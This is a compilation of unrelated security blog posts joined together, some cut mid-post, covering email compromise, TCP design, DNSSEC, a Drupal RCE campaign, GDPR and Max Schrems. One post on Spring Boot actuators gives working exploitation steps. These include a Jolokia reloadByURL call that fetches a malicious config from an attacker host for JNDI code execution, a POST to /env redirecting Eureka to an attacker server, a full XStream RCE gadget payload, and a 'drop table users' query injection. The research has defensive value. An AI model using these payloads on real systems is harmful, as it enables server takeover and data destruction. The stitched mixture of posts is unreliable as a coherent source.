There are two misconceptions to put right here. We might not fully value the security of our email account. We might also mistakenly assume that someone else is looking after it and keeping it secure – especially in these days of cloud services. But you know what they say about assumptions! For individual accounts, changing to a strong password, passphrase, or better yet multi-factor authentication (where something like a text message can be used to authenticate your access), will at least strengthen the protection.
In my experience, many companies just use cloud-based email with default settings. Instead, they should tailor the level of security to their risk. The potential impact from true business email compromise is so damaging that there is a strong argument for making companies focus attention on protecting their email above all other systems. There are plenty of security controls to help do this, from two-factor authentication to data loss prevention, and security awareness training. An attacker only has to get lucky once, as the old security saying goes. And if one finds their way in, you might as well switch off the lights on your way out.
The post More cod than phishing: why business email compromise is a bigger risk than you think appeared first on BH Consulting.
I have a very basic computer networking question: when sending a TCP packet, is the packet ACK'ed at every node in the route between the sender and the recipient, or just by the final recipient?This isn't just a basic question, it is the basic question, the defining aspect of TCP/IP that makes the Internet different from the telephone network that predated it.
Remember that the telephone network was already a cyberspace before the Internet came around. It allowed anybody to create a connection to anybody else. Most circuits/connections were 56-kilobits-per-secondl using the "T" system, these could be aggregated into faster circuits/connections. The "T1" line consisting of 1.544-mbps was an important standard back in the day.
In the phone system, when a connection is established, resources must be allocated in every switch along the path between the source and destination. When the phone system is overloaded, such as when you call loved ones when there's been an earthquake/tornado in their area, you'll sometimes get a message "No circuits are available". Due to congestion, it can't reserve the necessary resources in one of the switches along the route, so the call can't be established.
"Congestion" is important. Keep that in mind. We'll get to it a bit further down.
The idea that each router needs to ACK a TCP packet means that the router needs to know about the TCP connection, that it needs to reserve resources to it.
This was actually the original design of the the OSI Network Layer.
Let's rewind a bit and discuss "OSI". Back in the 1970s, the major computer companies of the time all had their own proprietary network stacks. IBM computers couldn't talk to DEC computers, and neither could talk to Xerox computers. They all worked differently. The need for a standard protocol stack was obvious.
To do this, the "Open Systems Interconnect" or "OSI" group was established under the auspices of the ISO, the international standards organization.
The first thing the OSI did was create a model for how protocol stacks would work. That's because different parts of the stack need to be independent from each other.
For example, consider the local/physical link between two nodes, such as between your computer and the local router, or your router to the next router. You use Ethernet or WiFi to talk to your router. You may use 802.11n WiFi in the 2.4GHz band, or 802.11ac in the 5GHz band. However you do this, it doesn't matter as far as the TCP/IP packets are concerned. This is just between you and your router, and all the information is stripped out of the packets before they are forwarded to across the Internet.
Likewise, your ISP may use cable modems (DOCSIS) to connect your router to their routers, or they may use xDSL. This information is likewise is stripped off before packets go further into the Internet. When your packets reach the other end, like at Google's servers, they contain no traces of this.
There are 7 layers to the OSI model. The one we are most interested in is layer 3, the "Network Layer". This is the layer at which IPv4 and IPv6 operate. TCP will be layer 4, the "Transport Layer".
The original idea for the network layer was that it would be connection oriented, modeled after the phone system. The phone system was already offering such a service, called X.25, which the OSI model was built around. X.25 was important in the pre-Internet era for creating long-distance computer connections, allowing cheaper connections than renting a full T1 circuit from the phone company. Normal telephone circuits are designed for a continuous flow of data, whereas computer communication is bursty. X.25 was especially popular for terminals, because it only needed to send packets from the terminal when users were typing.
Layer 3 also included the possibility of a connectionless network protocol, like IPv4 and IPv6, but it was assumed that connection oriented protocols would be more popular, because that's how the phone system worked, which meant that was just how things were done.
The designers of the early Internet, like Bob Kahn (pbuh) and Vint Cerf (pbuh), debated this. They looked at Cyclades, a French network, which had a philosophical point of view called the end-to-end principle, by which I mean the End-To-End Principle. This principle distinguishes the Internet from the older phone system. The Internet is an independent network from the phone system, rather than an extension of the phone system like X.25.
The phone system was defined as a smart network with dumb terminals. Your home phone was a simple circuit with a few resisters, speaker, and microphone. It had no intelligence. All the intelligence was within the network. Unix was developed in the 1970s to run on phone switches, because it was the switches inside the network that were intelligent, not the terminals on the end. That you are now using Unix in your iPhone is the opposite of what they intended.
Even mainframe computing was designed this way. Terminals were dumb devices with just enough power to display text. All the smart processing of databases happened in huge rooms containing the mainframe.
The end-to-end principle changes this. It instead puts all the intelligence on the ends of the network, with smart terminals and smart phones. It dumbs down the switches/routers to their minimum functionality, which is to route packets individually with no knowledge about what connection they might be a part of. A router receives a packet on a link, looks at it's destination IP address, and forwards it out the appropriate link in necessary direction. Whether it eventually reaches its destination is of no concern to the router.
In the view of the telephone network, new applications meant upgrading the telephone switches, and providing the user a dumb terminal. Movies of the time, like 2001: A Space Odyssey and Blade Runner would show video phone calls, offered by AT&T, with the Bell logo. That's because such applications where always something that the phone company would provide in the future.
With the end-to-end principle the phone company simply routes the packets, and the apps are something the user chooses separately. You make video phones calls today, but you use FaceTime, Skype, WhatsApp, Signal, and so on. My wireless carrier is AT&T, but it's absurd thinking I would ever make a video phone call using an app provided to me by AT&T, as I was shown in the sci-fi movies of my youth.
So now let's talk about congestion or other errors that cause packets to be lost.
It seems obvious that the best way to deal with lost packets is at the point where it happens, to retransmit packets locally instead of all the way from the remote ends of the network.
This turns out not to be the case. Consider streaming video from Netflix when congestion happens. When that happens, it wants to change the encoding of the video to a lower bit rate. You see this when watching Netflix during prime time (6pm to 11pm), where videos are of poorer quality than during other times of the day. It's streaming them at a lower bit rate due to their system being overloaded.
If routers try to handle dropped packets locally, then they give limited feedback about the congestion. It would require some sort of complex signaling back to the ends of the network informing them about congestion in the middle.
With the end-to-end principle, when congestion happens, when a router can't forward a packet, it silently drops it, performing no other processing or signaling about the event. It's up to the ends to notice this. The sender doesn't receive an ACK, and after a certain period of time, resends the data. This in turn allows the app to discover congestion is happening, and to change its behavior accordingly, such as lowering the bitrate at which its sending video.
Consider what happens with a large file download, such as your latest iOS update, which can be a gigabyte in size. How fast can the download happen?
You can see this behavior when visiting a website like speedtest.net. You see it slowly increase the speed until it reaches its maximum level. This isn't a property of the SpeedTest app, but a property of how TCP works.
TCP also tracks the round trip time (RTT), the time it takes for a packet to be acknowledged. If the two ends are close, RTT should be small, and the amount of time waiting to resend a lost packet should be shorter, which means it can respond to congestion faster, and more carefully tune the proper transmit rate.
This is why buffer bloat is a problem. When a router gets overloaded, instead of dropping a packet immediately, it can instead decide to buffer the packet for a while. If the congestion is transitory, then it'll be able to send the packet a tiny bit later. Only if the congestion endures, and the buffer fills up, will it start dropping packets.
This sounds like a good idea, to improve reliability, but it messes up TCP's end-to-end behavior. It can no longer reliably reliably measure RTT, and it can no longer detect congestion quickly and backoff on how fast it's transmitting, causing congestion problems to be worse. It means that buffering in the router doesn't work, because when congestion happens, instead of backing off quickly, TCP stacks on the ends will continue to transmit at the wrong speed, filling the buffer. In many situations, buffering increases dropped packets instead of decreasing them.
Thus, the idea of trying to fix congestion in routers by adding buffers is a bad idea.
Routers will still do a little bit of buffering. Even on lightly loaded networks, two packets will arrive at precisely the same time, so one needs to be sent before the other. It's insane to drop the other at this point when there's plenty of bandwidth available, so routers will buffer a few packets. The solution is to reduce buffer to the minimum, but not below the minimum.
Consider Google's HTTP/3 protocol, how they are moving to UDP instead of TCP. There are various reasons for doing this, which I won't go into here. Notice how if routers insisted on being involved in the transport layer, of retransmitting TCP packets locally, how the HTTP/3 upgrade on the ends within the browser wouldn't work. HTTP/3 takes into consideration information that is encrypted within the the protocol, something routers don't have access to.
This end-to-end decision was made back in the early 1970s as the Internet has wildly evolved. Our experience 45 years later is that this decision was a good one.
Now let's discuss IPv6 and NAT.
As you know, IPv4 uses 32-bit network addresses, which have only 4-billion combinations, allowing only 4-billion devices on the Internet. However, there are more than 10-billion devices on the network currently, more than 20-billion by some estimates.
The way this is handled is network address translation or NAT. Your home router has one public IPv4 address, like 22.214.171.124. Then, internal to your home or business, you get a local private IPv4 address, likely in the range 10.x.x.x or 192.168.x.x. When you transmit packets, your local router changes the source address from the private one to the public one, and on incoming packets, changes the public address back to your private address.
It does this by tracking the TCP connection, tracking the source and destination TCP port numbers. It's really a TCP/IP translator rather than just an IP translator.
This violates the end-to-end principle, but only a little bit. While the NAT is translating addresses, it's still not doing things like acknowledging TCP packets. That's still the job of the ends.
As we all know, IPv6 was created in order to expand the size of addresses, from 32-bits to 128-bits, making a gazillion addresses available. It's often described in terms of the Internet running out addresses needing more, but that's not the case. With NAT, the IPv4 Internet will never run out of addresses.
Instead, what IPv6 does is preserve the end-to-end principle, by keeping routers dumb.
I mention this because I find discussions of IPv6 a bit tedious. The standard litany is that we need IPv6 so that we can have more than 4-billion devices on the Internet, and people keep repeating this despite there being more than 10-billion devices on the IPv4 Internet.
As I stated above, this isn't just a basic question, but the basic question. It's at the center of a whole web of interlocking decisions that define the nature of cyberspace itself.
From the time the phone system was created in the 1800s up until the 2007 release of the iPhone, phone companies wanted to control the applications that users ran on their network. The OSI Model that you learn as the basis of networking isn't what you think it is: it was designed with the AT&T phone network and IBM mainframes being in control over your applications.
The creation of TCP/IP and the Internet changed this, putting all the power in the hands of the ends of the network. The version of the OSI Model you end up learning is a retconned model, with all the original important stuff stripped out, and only the bits that apply to TCP/IP left remaining.
Of course, now we live in a world monopolized by the Google, the Amazon, and the Facebook, so we live in some sort of dystopic future. But it's not a future dominated by AT&T.
|Haywood Floyd phones home in 2001: A Space Oddesy|
Powerful malicious actors continue to be a substantial risk to key parts of the Internet and its Domain Name System security infrastructure, so much so that The Internet Corporation for Assigned Names and Numbers is calling for an intensified community effort to install stronger DNS security technology.
Specifically ICANN is calling for full deployment of the Domain Name System Security Extensions (DNSSEC) across all unsecured domain names. DNS,often called the internet’s phonebook, is part of the global internet infrastructure that translates between common language domain names and IP addresses that computers need to access websites or send emails. DNSSEC adds a layer of security on top of DNS.
Another remote code execution vulnerability has been revealed in Drupal, the popular open-source Web content management system. One exploit — still working at time of this writing — has been used in dozens of unsuccessful attacks against our customers, with an unknown number of attacks, some likely successful, against other websites.
Published on February 20th, the new vulnerability (known as CVE 2019-6340 and SA-CORE-2019-003) is about fields types that don’t sanitize data from non-form sources when the Drupal 8 core REST module and another web services module such as JSON:API are both enabled. This allows arbitrary PHP remote code execution that could lead to compromise of the web server.
An exploit was published a day after the vulnerability was published, and continues to work even after following the Drupal team’s proposed remediation of disabling all web services modules and banning PUT/PATCH/POST requests to web services resources. Despite the fix, it is still possible to issue a GET request and therefore perform remote code execution as was the case with the other HTTP methods. Fortunately, users of Imperva’s Web Application Firewall (WAF) were protected.
Imperva research teams constantly analyze attack traffic from the wild that passes between clients and websites protected by our services. We’ve found dozens of attack attempts aimed at dozens of websites that belong to our customers using this exploit, including sites in government and the financial services industry.
The attacks originated from several attackers and countries, and all were blocked thanks to generic Imperva policies that had been in place long before the vulnerability was published.
Figure 1 below shows the daily number of CVE 2019-6340 exploits we’ve seen in the last couple of days.
Figure 1: Attacks by date
As always, attacks followed soon after the exploit was published. So being up to date with security updates is a must.
According to Imperva research, 2018 saw a year-over-year increase in Drupal vulnerabilities, with names such as DirtyCOW and Drupalgeddon 1, 2 and 3. These were used in mass attacks that targeted hundreds of thousands of websites.
The following is CoinIMP’s client side embedded script (https://pastebin.com/raw/RxqMSZEk). The script uses a 64 character length key generated by the CoinIMP panel to designate the site key of the attacker on CoinIMP.
The attacker’s payload also tries to install a shell uploader to upload arbitrary files on demand.
Here is the upload shell (http://pastebin.com/raw/P6N6XP2Q) content:
Imperva Customers Protected
Customers of Imperva Web Application Firewall (WAF, formerly Incapsula) were protected from this attack due to our RCE detection rules. So although the attack vector is new, its payload is old and has been dealt with in the past.
We also added new dedicated and generic rules to our WAF (both the services formerly known as Incapsula and SecureSphere) to strengthen our security and provide wider coverage to attacks of this sort.
The post Latest Drupal RCE Flaw Used by Cryptocurrency Miners and Other Attackers appeared first on Blog.
A 3-steps-guide to building your personal brand and advancing your InfoSec career.
Developing a personal brand can offer numerous benefits to your life and career. In addition, it can also help in building up your confidence and credibility to future employers, or even business partners.
Here are some of the things to cross off your list to get started with your personal branding:
Build Up Social Media Profiles
Your presence on LinkedIn and other professional and educational networking sites can help build up your personal brand. Here are some of the things you should list:
- Your experience: Where you have interned, worked, consulted, helped, etc.
- Your accomplishments: What have you helped companies achieve? Have you organized a successful InfoSec event? Did you successfully handled a live attack?
- Your tactical and personal skills: Both practical and personal skills make your personal brand. Indeed, practical skills show what you are capable of in your career, but personal skills will attract the right kind of partners and/or employers.
- Your career goals: Did you reach your most valuable dream? Whether you have or not, list it here. You never know who might have insight or who can help you get there.
Create Valuable Content
It’s good to say what you’re capable of, it’s better to show it. Creating valuable content and giving back to the InfoSec community goes a long way to building your personal brand. Here are some ideas of content you can create to build your trust and authority:
- Write “How-To” blogs and video tutorials to help others get better at whatever topics you feel is important to write about.
- Share reviews on software and services to help guide others after you.
- Participate in guest-speaking webinars to discuss your area of expertise and answer questions other professionals might have.
- Redact blogs about your career to guide other professionals down the same path or about software/ tools that you use to teach them the tricks.
- Record InfoSec-related podcasts if you’re not good at writing, but feel at ease taking on the microphone.
While there’s a multitude of possible content to create to build your personal brand, it’s important to remember that you want to focus on what people want to watch, listen or read about. To know that, it’s important to network with other professionals and aspiring professionals. Which bring us to our next point…
Network & Help Others
Make security conferences your best friend. But not only. From the comfort of your own home, you can network with students and professionals around the world via social media, forums, groups, and dedicated professional networks such as The Ethical Hacker Network.
Learn more about how the various ways EH-Net can add value to your career.
Networking with other professionals is not just about you and building your personal brand, it’s also about giving back to the InfoSec community like others before you might have helped you grow as well.
Building your personal brand takes a bit of time, but also bring to life endless opportunities, whether they are projects, new job offers, and/or also good friends with the same passion for all things security.
Interested in taking a first step to building your personal brand? Find out how you can get published on The Ethical Hacker Network today.
Connect with us on Social Media:
The Belgian Data Protection Authority (the “Belgian DPA”) recently published (in French and in Dutch) the updated list of the types of processing activities which require a data protection impact assessment (“DPIA”). Article 35.4 of the EU General Data Protection Regulation (“GDPR”) obligates supervisory authorities (“SAs”) to establish a list of the processing operations that require a DPIA and transmit it to the European Data Protection Board (the “EDPB”).
The draft list was published in April 2018. In October, the EDPB adopted an Opinion on the draft DPIA lists established by the SAs, including the Belgian DPA. Following the EDPB’s Opinion, the Belgian DPA modified its list. The Belgian DPA asserts that this list is neither exhaustive nor final and could be modified in the future.
According to the Belgian DPA, the following data processing activities require companies to conduct a DPIA:
- Processing of biometric data for the purpose of uniquely identifying individuals in a public area or private area that is publicly accessible;
- Collecting personal data from third parties in order weigh that information in making a decision to refuse or end a contract with an individual;
- Collecting health-related data by automated means through an active implantable medical device;
- Processing of personal data collected on a large scale by third parties to analyze or predict the economic situation, health, preferences or personal interests, reliability or behavior, localization or movements of natural persons;
- Systematic sharing between several data controllers of special categories of personal data (“sensitive personal data”) or data of a very personal nature (such as data related to poverty, unemployment, youth support or social work, data related to domestic and private activities and location data) between different data controllers;
- Large-scale processing of data generated by devices with sensors that send data over the Internet or any another means (i.e., Internet of Things applications such as smart TV, smart household appliances, connected toys, smart cities, smart energy systems) for the purpose of analyzing or predicting individuals’ economic situation, health, preferences or personal interests, reliability or behavior, localization or movements;
- Large-scale and/or systematic processing of telephony data, Internet data or other communication data, metadata or localization data of individuals, or that can lead to specific individuals (e.g., Wi-Fi tracking or processing of individuals’ localization data in public transports), when such processing is not strictly necessary for the service requested by the individuals; and
- Large-scale processing of personal data where individuals’ behavior is observed, collected, established or influenced in a systematic manner and using automated means, including for advertising purposes.
Last week on Malwarebytes Labs, we explored the world of crack hunting, gave you a 101 on the world of bots and their threats and advantages, and took a look at some clever phishing scams. We also explained how a Mac fends off malware, posted a handy “lazy person’s guide to cybersecurity,” and dug into some APT action.
Other security news
- YouTube ran into major problems, specifically, a network of pedophiles. (Source: Wired)
- Facebook improved location settings: Android users will now find they possess greater control over which information is shared with Facebook. (Source: Facebook)
- Big extortion, big money: Research reveals “salaries” of up to a quarter of a million dollars in return for getting up to dubious antics online. (Source: The Register)
- Flaw, blimey: A 19-year-old WinRAR bug was discovered. (Source: CheckPoint)
- Political infighting leads to data blowout: It’s all very exciting over in the UK, as a major political party reported a former member for alleged breach-related activity. (Source: The Guardian)
- Collection leaks and compromised passwords: How to steer clear of trouble related to the ongoing “Collection” dumps. (Source: Help Net Security)
- An egg in this trying time: A malware campaign offers up an eggy attack targeting job seekers. (Source: Proofpoint)
- ATM hacking: A look at how easy ATM shenanigans has become. (Source: Wired)
- BabyShark phishing: Yes, it’s a spear phishing campaign called BabyShark. (Source: ZDNet)
- Wi-Fi and social engineering: A look at some of the most common social engineering tricks deployed against networks. (Source: Security Boulevard)
Stay safe, everyone!
Here, we list upcoming events, conferences, webinars and training featuring members of the BH Consulting team presenting about cybersecurity, risk management, data protection, GDPR, and privacy.
Cloud & Cyber Security Expo: London, 12-13 March
Brian Honan will be presenting at this two-day event which takes place in London’s ExCel venue. There will be close to 150 speakers at the conference, which aims to help organisations implementing a digital transformation strategy to do so securely. General information is available at the event website, and organisers are still finalising the full speaker lineup. You can register via the site or directly at this link.
Security BSides Dublin: 23 March 2019
The hugely successful and growing Security BSides series is coming to Dublin for the first time. The event will take place at the Convention Centre Dublin on Saturday 23 March 2019. We at BH Consulting have been long-time supporters of the community-driven series, and we’ll be sponsoring the inaugural Dublin event. The organisers are still accepting calls for papers from industry newcomers and veterans like. Visit here to find out more.
Data Protection Officer certification course: Maastricht, 1-5 April
BH Consulting contributes to this specialised hands-on training course that provides the knowledge needed to carry out the role of a data protection officer under the GDPR. This course awards the ECPC DPO certification from Maastricht University. Places are still available at this course, and a link to book a place is available here. BH Consulting contributes to this specialised hands-on training course that provides the knowledge needed to carry out the role of a data protection officer under the GDPR. This course awards the ECPC DPO certification from Maastricht University. Places are still available at this course, and a link to book a place is available here.
Procurex Ireland 2019: Dublin, 4 April
BH Consulting will be exhibiting at Procurex Ireland 2019, a conference dedicated to procurement in healthcare. The day-long event is an opportunity for buyers and suppliers to engage and drive greater efficiencies and savings in an area with a combined spend of more than €12 billion. The conference will take place on Thursday 4 April at the RDS Exhibition Centre in Dublin. More details here.
Zero Days CTF: Dublin, 5 April
The Irish Colleges Cyber Challenge, better known as Zero Days CTF, will take place on Friday 5 April. BH Consulting is supporting this event, which aims to showcase and identify the best cybersecurity students in the country. The event caters for all skill levels and will include more than 50 unique challenges. To find out more, or to register a team, visit the Zero Days website.
Dublin Data Sec 2019: 30 April
Brian Honan is among a range of international speakers and subject matter experts lined up for this year’s data security conference. Topics for the 2019 edition include privacy and data leaks, dealing with breaches, data protection in the public sector, encryption, blockchain, and much more. The event takes place at the RDS Conference Hall on Tuesday 30 April. Standard tickets cost €350 and registration is via this link. General information about the conference is available here.
The post Upcoming cybersecurity events featuring BH Consulting appeared first on BH Consulting.
Microsoft's Windows Defender Advanced Threat Protection (ATP) service is now available for PCs running Windows 7 and Windows 8.1.
The decision to add devices powered by those operating systems was first announced a year ago. At the time, Microsoft said ATP's Endpoint Detection & Response (EDR) functionality would be available for the older OSes by summer 2018.
Windows Defender ATP is a service that detects ongoing attacks on corporate networks, then follows up to investigate the attack or breach and provides response recommendations and attack remediation. Software baked into Windows 10 detects attacks, while a central management console allows IT administrators to monitor the status of covered devices and react if necessary. Adding the EDR client software to Windows 7 and Windows 8.1 PCs gives enterprise IT the same visibility into those machines as it has had into Windows 10 systems.
The Spring Boot Framework includes a number of features called actuators to help you monitor and manage your web application when you push it to production. Intended to be used for auditing, health, and metrics gathering, they can also open a hidden door to your server when misconfigured.
When a Spring Boot application is running, it automatically registers several endpoints (such as '/health', '/trace', '/beans', '/env' etc) into the routing process. For Spring Boot 1 - 1.4, they are accessible without authentication, causing significant problems with security. Starting with Spring version 1.5, all endpoints apart from '/health' and '/info' are considered sensitive and secured by default, but this security is often disabled by the application developers.
The following Actuator endpoints could potentially have security implications leading to possible vulnerabilities:
- /dump - displays a dump of threads (including a stack trace)
- /trace - displays the last several HTTP messages (which could include session identifiers)
- /logfile - outputs the contents of the log file
- /shutdown - shuts the application down
- /mappings - shows all of the MVC controller mappings
- /env - provides access to the configuration environment
- /restart - restarts the application
For Spring 1x, they are registered under the root URL, and in 2x they moved to the "/actuator/" base path.
Most of the actuators support only GET requests and simply reveal sensitive configuration data, but several of them are particularly interesting for shell hunters:
1. Remote Code Execution via '/jolokia'
If the Jolokia Library is in the target application classpath, it is automatically exposed by Spring Boot under the '/jolokia' actuator endpoint. Jolokia allows HTTP access to all registered MBeans and is designed to perform the same operations you can perform with JMX. It is possible to list all available MBeans actions using the URL:
Again, most of the MBeans actions just reveal some system data, but one is particularly interesting:
The 'reloadByURL' action, provided by the Logback library, allows us to reload the logging config from an external URL. It could be triggered just by navigating to:
So, why should we care about logging config? Mainly because of two things:
- Config has an XML format, and of course, Logback parses it with External Entities enabled, hence it is vulnerable to blind XXE.
- The Logback config has the feature 'Obtaining variables from JNDI'. In the XML file, we can include a tag like '<insertFromJNDI env-entry-name="java:comp/env/appName" as="appName" />' and the name attribute will be passed to the DirContext.lookup() method. If we can supply an arbitrary name into the .lookup() function, we don't even need XXE or HeapDump because it gives us a full Remote Code Execution.
How it works:
1. An attacker requests the aforementioned URL to execute the 'reloadByURL' function, provided by the 'qos.logback.classic.jmx.JMXConfigurator' class.
2. The 'reloadByURL' function downloads a new config from http://artsploit.com/logback.xml and parses it as a Logback config. This malicious config should have the following content:
<configuration> <insertFromJNDI env-entry-name="ldap://artsploit.com:1389/jndi" as="appName" /> </configuration>
3. When this file is parsed on the vulnerable server, it creates a connection to the attacker-controlled LDAP server specified in the “env-entry-name” parameter value, which leads to JNDI resolution. The malicious LDAP server may return an object with 'Reference' type to trigger an execution of the supplied bytecode on the target application. JNDI attacks are well explained in this MicroFocus research paper. The new JNDI exploitation technique (described previously in our blog) also works here, as Tomcat is the default application server in the Spring Boot Framework.
2. Config modification via '/env'
If Spring Cloud Libraries are in the classpath, the '/env' endpoint allows you to modify the Spring environmental properties. All beans annotated as '@ConfigurationProperties' may be modified and rebinded. Many, but not all, properties we can control are listed on the '/configprops' actuator endpoint. Actually, there are tons of them, but it is absolutely not clear what we need to modify to achieve something. After spending a couple of days playing with them we found this:
POST /env HTTP/1.1 Host: 127.0.0.1:8090 Content-Type: application/x-www-form-urlencoded Content-Length: 65 eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
This property modifies the Eureka serviceURL to an arbitrary value. Eureka Server is normally used as a discovery server, and almost all Spring Cloud applications register at it and send status updates to it. If you are lucky to have Eureka-Client <1.8.7 in the target classpath (it is normally included in Spring Cloud Netflix), you can exploit the XStream deserialization vulnerability in it. All you need to do is to set the 'eureka.client.serviceUrl.defaultZone' property to your server URL ( http://artsploit.com/n/xstream) via '/env' and then call '/refresh' endpoint. After that, your server should serve the XStream payload with the following content:
<linked-hash-set> <jdk.nashorn.internal.objects.NativeString> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> </is> </dataSource> </dataHandler> </value> </jdk.nashorn.internal.objects.NativeString> </linked-hash-set>
This XStream payload is a slightly modified version of the ImageIO JDK-only gadget chain from the Marshalsec research. The only difference here is using LinkedHashSet to trigger the 'jdk.nashorn.internal.objects.NativeString.hashCode()' method. The original payload leverages java.lang.Map to achieve the same behaviour, but Eureka's XStream configuration has a custom converter for maps which makes it unusable. The payload above does not use Maps at all and can be used to achieve Remote Code Execution without additional constraints.
Using Spring Actuators, you can actually exploit this vulnerability even if you don't have access to an internal Eureka server; you only need an "/env" endpoint available.
Other useful settings:
spring.datasource.tomcat.validationQuery=drop+table+users - allows you to specify any SQL query, and it will be automatically executed against the current database. It could be any statement, including insert, update, or delete.
spring.datasource.tomcat.url=jdbc:hsqldb:https://localhost:3002/xdb - allows you to modify the current JDBC connection string.
The last one looks great, but the problem is when the application running the database connection is already established, just updating the JDBC string does not have any effect. Hopefully, there is another property that may help us in this case:
The trick we can use here is to increase the number of simultaneous connections to the database. So, we can change the JDBC connection string, increase the number of connections, and after that send many requests to the application to simulate heavy load. Under the load, the application will create a new database connection with the updated malicious JDBC string. I tested this technique locally agains Mysql and it works like a charm.
Apart from that, there are other properties that look interesting, but, in practice, are not really useful:
spring.datasource.url - database connection string (used only for the first connection)
spring.datasource.jndiName - databases JNDI string (used only for the first connection)
spring.datasource.tomcat.dataSourceJNDI - databases JNDI string (not used at all)
spring.cloud.config.uri=http://artsploit.com/ - spring cloud config url (does not have any effect after app start, only the initial values are used.)
These properties do not have any effect unless the '/restart' endpoint is called. This endpoint restarts all ApplicationContext but its disabled by default.
There are a lot of other interesting properties, but most of them do not take immediate effect after change.
N.B. In Spring Boot 2x, the request format for modifying properties via the '/env' endpoint is slightly different (it uses json format instead), but the idea is the same.
An example of the vulnerable app:
If you want to test this vulnerability locally, I created a simple Spring Boot application on my Github page. All payloads should work there, except for database settings (unless you configure it).
Black box discovery:
A full list of default actuators may be found here: https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt. Keep in mind that application developers can create their own endpoints using @Endpoint annotation.
Almost one decade ago, disparate efforts began in the European Union to change the way the world thinks about online privacy.
One effort focused on legislation, pulling together lawmakers from 28 member-states to discuss, draft, and deploy a sweeping set of provisions that, today, has altered how almost every single international company handles users’ personal information. The finalized law of that effort—the General Data Protection Regulation (GDPR)—aims to protect the names, addresses, locations, credit card numbers, IP addresses, and even, depending on context, hair color, of EU citizens, whether they’re customers, employees, or employers of global organizations.
The second effort focused on litigation and public activism, sparking a movement that has raised at least nearly half a million dollars to fund consumer-focused lawsuits meant to uphold the privacy rights of EU citizens, and has resulted in the successful dismantling of a 15-year-old intercontinental data-transfer agreement for its failure to protect EU citizens’ personal data. The 2015 ruling sent shockwaves through the security world, and forced companies everywhere to scramble to comply with a regulatory system thrown into flux.
The law was passed. The movement is working. And while countless individuals launched investigations, filed lawsuits, participated in years-long negotiations, published recommendations, proposed regulations, and secured parliamentary approval, we can trace these disparate yet related efforts back to one man—Maximilian Schrems.
Remarkably, as the two efforts progressed separately, they began to inform one another. Today, they work in tandem to protect online privacy. And businesses around the world have taken notice.
The impact of GDPR today
A Portuguese hospital, a German online chat platform, and a Canadian political consultancy all face GDPR-related fines issued last year. In January, France’s National Data Protection Commission (CNIL) hit Google with a 50-million-euros penalty—the largest GDPR fine to date—after an investigation found a “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization.”
The investigation began, CNIL said, after it received legal complaints from two groups: the nonprofit La Quadrature du Net and the non-governmental organization None of Your Business. None of Your Business, or noyb for short, counts Schrems as its honorary director. In fact, he helped crowdfund its launch last year.
Outside the European Union, lawmakers are watching these one-two punches as a source of inspiration.
When testifying before Congress about a scandal involving misused personal data, the 2016 US presidential election, and a global disinformation campaign, Facebook CEO Mark Zuckerberg repeatedly heard calls to regulate his company and its data-mining operations.
“The question is no longer whether we need a federal law to protect consumers privacy,” said Republican Senator John Thune of South Dakota. “The question is what shape will that law take.”
Democratic Senator Mark Warner of Virginia put it differently: “The era of the Wild West in social media is coming to an end.”
A new sheriff comes to town
In 2011, Schrems was a 23-year-old law student from Vienna, Austria, visiting the US to study abroad. He enrolled in a privacy seminar at the Santa Clara University School of Law where, along with roughly 22 other students, he learned about online privacy law from one of the field’s notable titans.
Professor Dorothy Glancy practiced privacy law before it had anything to do with the Internet, cell phones, or Facebook. Instead, she navigated the world of government surveillance, wiretaps, and domestic spying. She served as privacy counsel to one of the many subcommittees that investigated the Watergate conspiracy.
Later, still working for the subcommittee, she examined the number of federal agency databases that contained people’s personally identifiable information. She then helped draft the Privacy Act of 1974, which restricted how federal agencies collected, used, and shared that information. It is one of the first US federal privacy laws.
The concept of privacy has evolved since those earlier days, Glancy said. It is no longer solely about privacy from the government. It is also about privacy from corporations.
“Over time, it’s clear that what was, in the 70s, a privacy problem in regards to Big Brother and the federal government, has now gotten so that a lot of these issues have to do with the private [non-governmental] collection of information on people,” Glancy said.
In 2011, one of the biggest private, non-governmental collectors of that information was Facebook. So, when Glancy’s class received a guest presentation from Facebook privacy lawyer Ed Palmieri, Schrems paid close attention, and he didn’t like what he heard.
For starters, Facebook simply refused to heed Europe’s data privacy laws.
Speaking to 60 Minutes, Schrems said: “It was obviously the case that ignoring European privacy laws was the much cheaper option. The maximum penalty, for example, in Austria, was 20,000 euros. So, just a lawyer telling you how to comply with the law was more expensive than breaking it.”
Further, according to Glancy, Palmieri’s presentation showed that Facebook had “absolutely no understanding” about the relationship between an individual’s privacy and their personal information. This blind spot concerned Schrems to no end. (Palmieri could not be reached for comment.)
“There was no understanding at all about what privacy is in the sense of the relationship to personal information, or to human rights issues,” Glancy said. “Max couldn’t quite believe it. He didn’t quite believe that Facebook just didn’t understand.”
So Schrems investigated. (Schrems did not respond to multiple interview requests and he did not respond to an interview request forwarded by his colleagues at Noyb.)
Upon returning to Austria, Schrems decided to figure out just how much information Facebook had on him. The answer was astonishing: Facebook sent Schrems a 1,200-page PDF that detailed his location history, his contact information, information about past events he attended, and his private Facebook messages, including some he thought he had deleted.
Shocked, Schrems started a privacy advocacy group called “Europe v. Facebook” and uploaded redacted versions of his own documents onto the group’s website. The revelations touched a public nerve—roughly 40,000 Europeans soon asked Facebook for their own personal dossiers.
The Irish Data Protection Commissioner rolled Schrems’ complaints into an already-running audit into Facebook, and, in December 2011, released non-binding guidance for the company. Facebook’s lawyers also met with Schrems in Vienna for six hours in February 2012.
